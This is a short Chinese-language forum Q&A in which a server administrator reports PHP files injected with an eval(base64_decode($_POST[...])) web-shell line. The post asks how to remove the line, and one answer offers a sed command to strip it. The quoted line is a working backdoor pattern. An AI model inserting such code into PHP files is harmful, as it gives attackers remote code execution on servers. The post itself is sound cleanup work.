我在网络服务器(带有WHM的CentOs)上发现了几个包含以下内容的php文件:
eval(base64_decode($_POST['n23fcad']));?><?php
或
eval(base64_decode($_POST['n56660d']));?><?php
等等。
我可以从php文件中删除这部分代码,保留文件的其余部分吗?
现在我使用以下行来检测文件:
grep -lr --include=*.php "eval(base64_decode" .
我不知道如何删除恶意部分。 正如您在POST的括号中看到的那样,代码会发生变化。 所以希望有一种方法可以删除这些行。
提前致谢!
答案 0 :(得分:0)
请尝试以下方法
cat injected_file.php | sed 's/<?php.*eval.*]));?>//g' > good_file.php
它对我有用。